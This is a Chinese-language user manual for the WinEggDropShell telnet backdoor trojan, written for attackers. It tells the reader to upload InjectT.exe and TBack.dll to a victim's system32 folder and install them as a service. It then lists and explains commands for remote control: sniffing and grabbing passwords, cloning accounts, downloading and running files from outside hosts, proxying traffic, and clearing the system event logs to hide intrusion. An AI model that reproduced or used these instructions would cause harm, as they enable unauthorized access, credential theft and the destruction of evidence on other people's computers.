telnet木马wineggdrop shell 极终版使用说明书.txt

黑客的指令

程序说明:一个扩展型的telnet后门程序

特点:
1.比较小型，除了用汇编写外，同样功能，同样质量和同类型的后门程序，不怎么可能会写得比这
个更小的了。
2.有其它同类型后门程序(推出比这个早的同类型后门)没有的功能,如clone(克隆帐户),installterm
(安装终端服务),fport(这个不太肯定，据闻红盟那个hgod什么的也有这功能),sid,控制台模式的
注册表操作,Sock5代理等等功能.
3.完善的在线帮助,对于带参数命令，如果忘记语法，只要输入那个命令，就可以看到用法和一个
例子.
自己使用过后，才可以清楚感受到这后门程序的特色以及和其它后门程序间的分别。

特别声明:使用前请将说明文件看明白。

Private Version功能
1.Pslist 功能说明:显示进程
2.ListIP 功能说明:显示系统所有IP和域名
3.ShowSID 功能说明:显示所有系统帐户的SID(读注册表中sam下的值得到)
4.Fport 功能说明:进程打开的端口列表
5.Online 功能说明:列出所有连接进去这个后门的用户的IP
6.WhoIsShell 功能说明:列出哪个IP得到一个shell
7.ShowName 功能说明:显示所有系统帐户(通过读注册表,可以显示到隐藏帐户)
8.Reboot 功能说明:重启那台系统
9.ShutDown 功能说明:关闭那台系统
10.Logoff 功能说明:注销登陆了的帐户
11.PowerOff 功能说明:关那系统电源
12.Shell 功能说明:得到一个Shell
13.Stopbackdoor 功能说明:停止wineggdropshell服务
14.pskill 功能说明:杀进程
15.Never 功能说明:设置某个帐户使其的登陆时间被改为从
无登陆以及登录次数为0.
16.DirFile 功能说明:显示当前目录文件
17.DelFile 功能说明:删除文件
18.Execute 功能说明:执行程序
19.Http://IP/文件 功能说明:下载文件
20.Installterm 功能说明:安装终端服务
21.Clone 功能说明:克隆一个系统帐户
22.Send 功能说明:给其它连接上wineggdropshell的用户发信息
23.Exit 功能说明:断开连接
24.OffShell 功能说明:将得到Shell的用户踢下去
25.Help 功能说明:显示命令说明
26.Disconnect 功能说明:将其它用户踢下线去
27.StopService 功能说明:停止系统的某个服务
28.StartService 功能说明:启动系统某个服务
29.DeleteService 功能说明:删除系统某个服务
30.CleanEvent 功能说明:清除系统日志
31.TerminalPort 功能说明:查看或重新设置终端服务端口
32.Redirect 功能说明:TCP数据转发
33.ViewThreads 功能说明:查看TCP数据转发打开的线程
34.KillThreads 功能说明:杀掉某个TCP数据转发的线程
35.EnableFilter 功能说明:激活TCP/IP过滤
36.DisableFilter 功能说明:禁止TCP/IP过滤
37.FilterInfo 功能说明:查看TCP/IP过滤是处于激活还是禁止状态
38.AR 功能说明:恢复系统几个常用的关联的设置
39.GetUser 功能说明:列举系统所有帐户
40.ViewPath 功能说明:查看当前目录
41.SetPath 功能说明:设置当前目录
42.SID 功能说明:查看本地或远程系统帐户的SID
43.ViewTimeOut 功能说明:查看超时秒数
44.SetTimeOut 功能说明:设置超时秒数
45.StartSniffer 功能说明:启动嗅觉密码功能
46.StopSniffer 功能说明:停止嗅觉功能
47.ViewSniffer 功能说明:查看嗅觉密码功能是否在进行
48.Sysinfo 功能说明:查看系统的信息
49.ViewService 功能说明:查看某个服务的状态
50.ConfigService 功能说明:修改某个服务的启动状态
51.ViewKey 功能说明:查看run和runservices所有的项
52.DelKey 功能说明:删除run和runservices中的一个启动项
53.EnumService 功能说明:列举所有自动启动的服务的资料
54.RegEedit 功能说明:进入注册表操作模式
55.Findpassword 功能说明:得到所有当前登陆上系统的用户的密码
56.ExitShell 功能说明:在cmd的shell下返回到[Melody]模式
57.StartProxy 功能说明:启动Sock5代理
58.StopProxy 功能说明:停止Sock5代理
59.ViewProxyInfo 功能说明:查看Sock5代理信息


在使用程序前先看下面的说明:
1.先配置好InjectT.exe,然后将InjectT.exe和那个TBack.Dll上载到其它系统的winnt\system32下，
然后执行
InjectT.exe -run (安装为服务并且执行)


以下命令是当你用Telnet连接上WinEggDropShell后门并成功通过验证到达[Melody]模式使用的命令:
V1.50命令如下
1.pslist 功能：显示系统进程
用法:pslist

2.ListIP 功能:显示系统所有IP(外部，内部IP和电脑名等)
用法:ListIP

3.ShowSID 功能:显示系统帐户的SID
用法:ShowSID

4.ShowName 功能:显示系统所有帐户(不同于getuser,可以得到一些"隐藏"的帐户)
用法:ShowName

5.Fport 功能:进程到端口列表
用法:Fport

6.Online 功能:显示连接上wineggdropshell的用户的IP以及使用的Thread
用法:Online

7.WhoIsShell 功能:显示哪个IP正在使用Shell
用法:WhoIsShell

8.Reboot 功能:重启系统
用法:Reboot

9.ShutDown 功能:关闭系统
用法:ShutDown

10.Logoff 功能:注销登陆了的系统用户
用法:Logoff

11.PowerOff 功能:关闭电源
用法:PowerOff

12.Shell 功能:得到一个Cmd Shell
用法:Shell

13.Stopbackdoor 功能:停止WinEggDropShell服务(此功能在V1.38版本被禁止)
用法:Stopbackdoor

14.Help 功能:显示所有命令帮助
用法:Help 

15.Exit 功能:断开连接
用法:Exit

16.Pskill PID或程序名 功能:杀进程
用法:pskill 1234
用法:pskill notepad

17.Never 用户名 功能:更改某个用户的设定，使它的登陆次数变为0以及从没有登陆上系统
用法:Never Guest
用法:Never Administrator

18.DirFile 文件名 功能:显示当前目录的文件，支持通配符
用法:DirFile *.exe

19.DelFile 文件名 功能:删除当前目录的一个文件,不支持通配符
用法: DelFile a.txt

20.Execute 程序 功能:在后台中执行程序
用法:Execute abc.exe
用法:Execute net.exe user test test
注意:要执行的程序要加扩展名，否则可能不会执行成功.

21.http://ip/文件名 保存文件名 功能:下载程序
用法:http://11.11.11.11/a.exe a.exe
用法:http://www.mysite.com/a.exe a.exe

22.Installterm 端口 功能:在没有安装终端服务的win 2k服务版的系统中安装终端服务，重启系统后才生效.
用法:Installterm 3345 (重启后终端会打开3345那个端口,使用此命令前先看看你要定义的终端的端口是否被
其它程序所用)

23.Clone 帐户 要克隆的帐户 密码 功能:克隆一个帐户
用法:Clone Admin Guest test
上面用法会效Guest克隆到Admin那个用户中，并且Guest的密码被改为test

24.Send All 信息 功能:给其它登陆上wineggdropshell的用户发信息
用法:Send all 你好

25.OffShell 功能:将得到Shell的用户踢下去
用法:OffShell

26.Disconnect 功能:将其它用户(不管是否是得到shell)踢下线
用法:Disconnect ThreadNumber ->将某个用户踢下去
用法:Disconnect All ->将所有用户踢下去，除你自己外
注意:如何得到ThreadNumber呢?如果你使用Online这个命令(上面命令列表的第6个命令),你就可以得到
所有登陆了的用户的ThreadNumber.

27.StopService 功能:停止系统的某个服务
用法:StopService 服务名
例子:StopService w3svc(将IIS服务停止)

28.StartService 功能:启动系统某个服务
用法:StartService 服务名
例子:StartService w3svc(启动IIS服务)

29.DeleteService 功能:删除系统某个服务
用法:DeleteService 服务名
注意:一般在删除一个服务前要要将那个服务停止的，但因为有些服务对net stop是没有响应的，所以
只能是直接删除。当强行将一个正在运行的服务删除，服务还是在运行的，所以建议先使用stopservice
将服务停止，如果不能停止，那就另当别论.

30.CleanEvent 功能:删除系统日志
用法:CleanEvent
会将系统的Application,Security以及System的日志全部删除